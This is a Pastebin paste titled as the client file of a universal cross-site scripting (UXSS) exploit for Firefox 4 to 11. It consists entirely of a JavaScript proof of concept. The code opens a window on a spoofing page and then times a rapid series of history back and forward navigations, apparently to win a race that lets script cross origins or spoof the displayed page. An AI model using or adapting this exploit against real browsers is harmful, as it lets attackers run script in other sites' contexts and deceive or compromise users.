Advertisement
Guest User

FF4-11 _UXSS - Client File

a guest
Jul 1st, 2012
403
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 0.47 KB | None | 0 0
  1. <a href="javascript:spoof();">Click Me</a>
  2.  
  3. <script>
  4.  
  5. var a=null;
  6.  
  7. function spoof() {
  8.  
  9.   a = window.open('./spoofing.php')
  10.  
  11.   window.setTimeout("a.location.href='./spoofing.php'", 2500);
  12.  
  13.   window.setTimeout("a.history.back()", 5220);
  14.  
  15.   window.setTimeout("a.history.forward()", 5280);
  16.  
  17.   window.setTimeout("a.history.back()", 5300);
  18.  
  19.   window.setTimeout("a.history.forward()", 5328);
  20.  
  21.  
  22.  
  23.   window.setTimeout("a.history.back()", 7550)
  24.  
  25. }
  26.  
  27.  
  28. </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement